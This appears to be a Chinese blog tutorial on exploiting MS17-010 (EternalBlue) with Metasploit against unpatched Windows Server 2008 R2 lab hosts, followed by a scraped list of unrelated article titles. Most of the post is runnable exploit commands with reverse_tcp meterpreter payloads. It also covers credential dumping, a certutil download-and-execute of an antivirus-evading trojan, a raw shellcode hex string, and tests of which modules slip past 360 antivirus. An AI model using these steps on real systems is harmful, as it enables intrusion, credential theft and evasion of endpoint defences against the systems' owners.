msf下MS17-010模块使用总结

  • 前言
  • 环境搭建
  • 漏洞
    • 无杀软情况
    • 有杀软情况
  • 参考文章

前言

在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。

环境搭建

这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机
kali 192.168.164.155
靶机1 192.168.164.156
靶机2 192.168.164.161(丢一个360的安装包进去,等会要用)
靶机2还要开启命名管道的匿名访问
打开cmd 执行gpedit.msc,在计算机配置->windwos设置->安全设置->本地策略->安全选项,修改限制对命名管道和共享的匿名访问为已禁用

之后重启靶机2

漏洞

首先打开msf,搜索17010相关的模块

msfconsole
search 17-010

漏洞检测

auxiliary/scanner/smb/smb_ms17_010

漏洞检测方法

use auxiliary/scanner/smb/smb_ms17_010

之后设置一下目标ip和线程即可,这里因为已知ip和存在漏洞就不演示了

漏洞利用常使用的是

auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec

这里的第一个和第三个模块需要目标开启明明管道,并且比较稳定,第二个模块只要存在漏洞即可,但是会有概率把目标打蓝屏,而且杀软拦截也会比较严格,如果有杀软就基本可以放弃这个模块了

无杀软情况

无杀软的话可以先使用auxiliary/admin/smb/ms17_010_command模块探测一下是否可以使用命名管道

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.164.156 192.168.164.161
set command tasklist
show options
run


如果命令执行成功的话就可以优先考虑

auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_psexec

两个模块进行利用,第一个模块执行命令远程下载,之后在执行下载的muma,
第二个模块psexec直接设置目标的地址,之后执行就可以了

exploit/windows/smb/ms17_010_eternalblue不建议使用,有概率使目标蓝屏

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.164.156
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run

有杀软情况

这里就对模块进行测试,某卫士对不同模块的反应,双击靶机2上的360安装包,之后进行安装
首先是exploit/windows/smb/ms17_010_eternalblue

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.164.161
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run



msf这边很快就“完成了”攻击,
exploit/windows/smb/ms17_010_psexec模块

use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.164.161
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run


抓取密码

这边全程某卫士都没有反应

auxiliary/admin/smb/ms17_010_command模块
首先要准备好免杀muma,之后保存到vps上,这里为了方便就保存在局域网内,
再打开一个msf,监听shell

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
set lport 443
run
use auxiliary/admin/smb/ms17_010_command
set command certutil -urlcache -split -f http://192.168.164.138/met.exe %temp%/abc.exe
set rhosts 192.168.164.161
run
set command "%temp%/abc.exe fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc020001bbc0a8a49b41544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5"
run


某卫士也是全程无反应

如果自己的服务器没有访问日志的话就要检查下模板是否出网或者是否被拦截或者被杀,有访问日志的话,要等几分钟之后再次去执行命令运行

参考文章

https://docs.microsoft.com/zh-cn/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares
http://t3ngyu.leanote.com/post/MS17-010
https://jingyan.baidu.com/article/09ea3edec478a981afde3941.html

msf下MS17-010模块使用总结相关推荐

  1. kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)

    本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 ========= ...

  2. 基于MSF框架下的kiwi模块制作黄金票据

    目录 一.kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二.实验过程 1.环境构成 2.实验步骤 三.黄金票据的制作使用 1.制作票据的条件,以及如何获取该条件内容 ...

  3. 【骨架屏】【vue】如何在webpack+vue+vue-cli下搭建多模块/单模块多路由骨架屏

    如何在webpack+vue+vue-cli下搭建多模块/单模块多路由骨架屏 前言 骨架屏的用户感知比loading更好,此前看过很多专栏以及文章,此次实践中还是遇到需要学习的部分. 对于骨架屏或者占 ...

  4. Windows下使用apache模块实现合并多个js、css提高网页加载速度

    这篇文章主要介绍了Windows下使用apache模块实现合并多个js.css提高网页加载速度,本文使用的模块是基于mod_concat自己修改的,需要的朋友可以参考下 现在的网站表现力越来越丰富,页 ...

  5. liunx mysql模块_linux下安装MySQLdb模块_MySQL

    bitsCN.com linux下安装MySQLdb模块 1,查看是否已安装MySQLdb模块 进入python的命令行,输入 import MySQLdb 如果没有报错,证明此模块已经安装,可以跳过 ...

  6. 在没有网的windows环境下安装Python模块

    在安装python环境以及python的一些模块时,可能需要在没有网的windows环境下安装Python模块. python模块下载地址,几乎所有的模块都有:https://www.lfd.uci. ...

  7. Python下使用tarfile模块来实现文件归档压缩与解压

    Python下使用tarfile模块来实现文件归档压缩与解压   部分转自:http://www.diybl.com/course/3_program/python/20110510/555345.h ...

  8. python2.7下使用logging模块记录日志到终端显示乱码问题解决

    python2.7下使用logging模块记录日志到终端显示乱码问题解决 参考文章: (1)python2.7下使用logging模块记录日志到终端显示乱码问题解决 (2)https://www.cn ...

  9. 以apache模块的方式安装php,在WIN98下以apache模块方式安装php

    在WIN98下以apache模块方式安装php 2021-01-21 16:12:27982 在WIN98下以apache模块方式安装php手记 foolboy@chinaren.com ★相关软件: ...

最新文章

  1. python语音合成 标贝_tacotronV2 + wavernn 实现中文语音合成(Tensorflow + pytorch)
  2. Linux命令 swap:内存交换空间
  3. Eclipse错误提示: Symbol 'xxxx' could not be resolved
  4. 分析JDK中的Runtime的单例设计模式以及使用小例子
  5. php hash代码下载,PHP中的哈希表 hash_insert
  6. 武汉传媒学院有计算机专业吗,武汉传媒学院比较好的专业有哪些呢?
  7. ndarray、array、asarray的区别以及查看变量地址、is和==的区别
  8. 转,jQuery入门[4]-链式代码
  9. 恋恋风辰 对于redis底层框架的理解(一)
  10. 找不到所需的 Adobe Flash Player 调试器版本
  11. android定义颜色数组,Colours——一套漂亮的预定义颜色库和方法
  12. 半导体器件(一) 学习笔记
  13. bootstrap导航栏.nav与.navbar区别
  14. 快速获取InputBox选中区域的单个单元格引用地址
  15. 网络游戏外挂制作(3)
  16. CodeForces 868C Qualification Rounds
  17. linux的iptable开启命令,linux防火墙查看状态firewall、iptable
  18. 简单批处理文件使用win7自带wifi,妈妈再也不担心WiFi软件不稳定了
  19. codeforces 1665A (GCD vs LCM)思维
  20. C# 中的MessageBox 弹出提示框(消息框)的用法

热门文章

  1. 好用的ubuntu拼音输入法
  2. 更改cpuID(CPU序列号)指南
  3. 【C语言入门】VS编译器:scanf返回值被忽略
  4. 小程序事件绑定 传值和路由
  5. 030:vue+openlayers读取WKB数据(示例代码)
  6. Swing学习----------QQ登录界面制作(二)
  7. JS获取随机数的四种方法(转)
  8. 宜立方商城——搜索功能的实现
  9. python青蛙跳台阶_Python中跳台阶、变态跳台阶与矩形覆盖问题的解决方法
  10. 数据库系统的三级模式概念